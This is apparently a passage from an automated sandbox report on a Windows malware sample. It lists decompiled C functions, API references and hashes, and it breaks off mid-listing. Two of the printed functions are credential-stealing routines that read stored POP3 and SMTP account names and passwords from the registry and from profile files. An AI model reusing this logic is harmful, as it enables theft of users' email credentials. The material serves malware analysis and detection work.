                                                                                • EnumResourceNamesA.KERNEL32(?,?,0040ED0B,00000000), ref: 0040EDA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumNamesResource
                                                                                • String ID:
                                                                                • API String ID: 3334572018-0
                                                                                • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                                                • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406F5B, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406F5B(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                                                                0x00406f5b
                                                                                0x00406f62
                                                                                0x00406f65
                                                                                0x00406f6b
                                                                                0x00000000
                                                                                0x00406f6b
                                                                                0x00406f6e

                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                                • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040614B, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040614B(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                                0x0040614f
                                                                                0x0040615f

                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                                • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EB3F, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040EB3F(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}




                                                                                0x0040eb52
                                                                                0x0040eb58

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                                • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00402D9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040EB3F(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E004021D8( &_v1872);
					E004021D8( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040EB80(_t122, _t113);
					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040EB59(_t113, _a8, "PopPort",  &_v24);
					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401D18( &_v280, _t116);
					}
					if(_v408 != 0) {
						E00402407( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401D18( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E00402407( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}


































                                                                                0x00402d9a
                                                                                0x00402d9a
                                                                                0x00402d9a
                                                                                0x00402dad
                                                                                0x00402db7
                                                                                0x00402dc0
                                                                                0x00402dc7
                                                                                0x00402dca
                                                                                0x00402dcd
                                                                                0x00402dd8
                                                                                0x00402ddf
                                                                                0x00402de0
                                                                                0x00402de6
                                                                                0x00402df2
                                                                                0x00402df3
                                                                                0x00402df8
                                                                                0x00402dfb
                                                                                0x00402e07
                                                                                0x00402e0a
                                                                                0x00402e14
                                                                                0x00402e2a
                                                                                0x00402e40
                                                                                0x00402e56
                                                                                0x00402e67
                                                                                0x00402e78
                                                                                0x00402e9d
                                                                                0x00402e9f
                                                                                0x00402e9f
                                                                                0x00402eb1
                                                                                0x00402ec4
                                                                                0x00402eda
                                                                                0x00402ef0
                                                                                0x00402f04
                                                                                0x00402f18
                                                                                0x00402f3d
                                                                                0x00402f3f
                                                                                0x00402f3f
                                                                                0x00402f43
                                                                                0x00402f51
                                                                                0x00402f5e
                                                                                0x00402f63
                                                                                0x00402f6c
                                                                                0x00402f74
                                                                                0x00402f74
                                                                                0x00402f80
                                                                                0x00402f89
                                                                                0x00402f89
                                                                                0x00402f8e
                                                                                0x00402f93
                                                                                0x00402f9b
                                                                                0x00402f9b
                                                                                0x00402fa7
                                                                                0x00402fb0
                                                                                0x00402fb0
                                                                                0x00000000
                                                                                0x00402fb8
                                                                                0x00402fbf

                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                  • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                                • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                                • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                                • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$QueryValue$CloseOpen
                                                                                • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                • API String ID: 4127491968-1534328989
                                                                                • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                                • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004033D7, Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v664;
				intOrPtr _v796;
				char _v936;
				char _v1208;
				char _v1336;
				intOrPtr _v1340;
				char _v1596;
				intOrPtr _v1728;
				char _v1868;
				void* __esi;
				intOrPtr _t23;
				void* _t35;

				_t48 = __fp0;
				E004021D8( &_v936);
				E004021D8( &_v1868);
				_t23 = 4;
				_v796 = _t23;
				_v1728 = _t23;
				_v408 = _t23;
				_v1340 = 1;
				E00403397(__edi, "SMTPServer",  &_v664);
				E00403397(__edi, "ESMTPUsername",  &_v404);
				E00403397(__edi, "ESMTPPassword",  &_v276);
				E00403397(__edi, "POP3Server",  &_v1596);
				E00403397(__edi, "POP3Username",  &_v1336);
				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {
					E004033B8( &_v276);
					_t35 = E00402407( &_v936, __fp0, _a4);
				}
				if(_v1208 != 0) {
					E004033B8( &_v1208);
					return E00402407( &_v1868, _t48, _a4);
				}
				return _t35;
			}


















                                                                                0x004033d7
                                                                                0x004033e7
                                                                                0x004033f2
                                                                                0x004033f9
                                                                                0x004033fa
                                                                                0x00403400
                                                                                0x00403406
                                                                                0x00403419
                                                                                0x00403423
                                                                                0x00403435
                                                                                0x00403447
                                                                                0x00403459
                                                                                0x0040346b
                                                                                0x0040347d
                                                                                0x00403489
                                                                                0x00403491
                                                                                0x0040349f
                                                                                0x0040349f
                                                                                0x004034ab
                                                                                0x004034b3
                                                                                0x00000000
                                                                                0x004034c1
                                                                                0x004034c8

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                • API String ID: 3963849919-1658304561
                                                                                • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                                                • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F808, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 99%
                                                                                			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406512( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}



















































































































































                                                                                0x0040f813
                                                                                0x0040f81a
                                                                                0x0040f821
                                                                                0x0040f828
                                                                                0x0040f82f
                                                                                0x0040f836
                                                                                0x0040f83d
                                                                                0x0040f841
                                                                                0x0040f845
                                                                                0x0040f849
                                                                                0x0040f84d
                                                                                0x0040f851
                                                                                0x0040f855
                                                                                0x0040f85f
                                                                                0x0040f869
                                                                                0x0040f873
                                                                                0x0040f87d
                                                                                0x0040f887
                                                                                0x0040f891
                                                                                0x0040f89b
                                                                                0x0040f8a5
                                                                                0x0040f8af
                                                                                0x0040f8b9
                                                                                0x0040f8c3
                                                                                0x0040f8cd
                                                                                0x0040f8d7
                                                                                0x0040f8e1
                                                                                0x0040f8eb
                                                                                0x0040f8f5
                                                                                0x0040f8ff
                                                                                0x0040f909
                                                                                0x0040f913
                                                                                0x0040f91d
                                                                                0x0040f927
                                                                                0x0040f931
                                                                                0x0040f93b
                                                                                0x0040f945
                                                                                0x0040f94f
                                                                                0x0040f959
                                                                                0x0040f963
                                                                                0x0040f96d
                                                                                0x0040f977
                                                                                0x0040f981
                                                                                0x0040f98b
                                                                                0x0040f995
                                                                                0x0040f99f
                                                                                0x0040f9a9
                                                                                0x0040f9b3
                                                                                0x0040f9bd
                                                                                0x0040f9c7
                                                                                0x0040f9d1
                                                                                0x0040f9db
                                                                                0x0040f9e5
                                                                                0x0040f9ef
                                                                                0x0040f9f9
                                                                                0x0040fa03
                                                                                0x0040fa0d
                                                                                0x0040fa17
                                                                                0x0040fa21
                                                                                0x0040fa2b
                                                                                0x0040fa35
                                                                                0x0040fa3f
                                                                                0x0040fa49
                                                                                0x0040fa53
                                                                                0x0040fa5d
                                                                                0x0040fa67
                                                                                0x0040fa71
                                                                                0x0040fa7b
                                                                                0x0040fa85
                                                                                0x0040fa8f
                                                                                0x0040fa99
                                                                                0x0040faa3
                                                                                0x0040faad
                                                                                0x0040fab7
                                                                                0x0040fac1
                                                                                0x0040facb
                                                                                0x0040fad5
                                                                                0x0040fadf
                                                                                0x0040fae9
                                                                                0x0040faf3
                                                                                0x0040faf6
                                                                                0x0040fafa
                                                                                0x0040fafc
                                                                                0x0040fb00
                                                                                0x0040fb0a
                                                                                0x0040fb14
                                                                                0x0040fb1e
                                                                                0x0040fb28
                                                                                0x0040fb32
                                                                                0x0040fb3c
                                                                                0x0040fb46
                                                                                0x0040fb50
                                                                                0x0040fb5a
                                                                                0x0040fb64
                                                                                0x0040fb6e
                                                                                0x0040fb78
                                                                                0x0040fb82
                                                                                0x0040fb8c
                                                                                0x0040fb96
                                                                                0x0040fba0
                                                                                0x0040fbaa
                                                                                0x0040fbb1
                                                                                0x0040fbb8
                                                                                0x0040fbbf
                                                                                0x0040fbc6
                                                                                0x0040fbcd
                                                                                0x0040fbd4
                                                                                0x0040fbdb
                                                                                0x0040fbe2
                                                                                0x0040fbe9
                                                                                0x0040fbf0
                                                                                0x0040fbf7
                                                                                0x0040fde5
                                                                                0x0040fde8
                                                                                0x0040fdee
                                                                                0x0040fdf1
                                                                                0x0040fe04
                                                                                0x0040fdfd
                                                                                0x0040fdfd
                                                                                0x00000000
                                                                                0x0040fdfd
                                                                                0x0040fdf1
                                                                                0x0040fbfe
                                                                                0x0040fc0d
                                                                                0x0040fc10
                                                                                0x0040fc14
                                                                                0x0040fc17
                                                                                0x0040fd94
                                                                                0x0040fd98
                                                                                0x0040fdd2
                                                                                0x0040fdd5
                                                                                0x0040fd9e
                                                                                0x0040fda1
                                                                                0x0040fda6
                                                                                0x0040fdaa
                                                                                0x0040fdaf
                                                                                0x0040fdb6
                                                                                0x0040fdb6
                                                                                0x0040fdaf
                                                                                0x0040fdb8
                                                                                0x0040fdb8
                                                                                0x0040fdd6
                                                                                0x0040fdd7
                                                                                0x0040fdd7
                                                                                0x0040fdde
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fdde
                                                                                0x0040fc1d
                                                                                0x0040fc20
                                                                                0x0040fc23
                                                                                0x0040fc27
                                                                                0x0040fc31
                                                                                0x0040fc37
                                                                                0x0040fc3c
                                                                                0x0040fc41
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc43
                                                                                0x0040fc47
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc49
                                                                                0x0040fc51
                                                                                0x0040fd5c
                                                                                0x0040fd5c
                                                                                0x0040fd60
                                                                                0x0040fd63
                                                                                0x0040fd6b
                                                                                0x0040fd73
                                                                                0x0040fd7c
                                                                                0x0040fd81
                                                                                0x0040fd86
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fd88
                                                                                0x0040fd8f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fd91
                                                                                0x00000000
                                                                                0x0040fd91
                                                                                0x0040fdc5
                                                                                0x0040fdc8
                                                                                0x0040fdc9
                                                                                0x00000000
                                                                                0x0040fdc9
                                                                                0x0040fc57
                                                                                0x0040fc57
                                                                                0x0040fc5b
                                                                                0x0040fc60
                                                                                0x0040fd11
                                                                                0x0040fd11
                                                                                0x0040fd15
                                                                                0x0040fd17
                                                                                0x0040fd26
                                                                                0x0040fd26
                                                                                0x0040fd2a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fd1d
                                                                                0x0040fd2f
                                                                                0x0040fd31
                                                                                0x00000000
                                                                                0x00000000
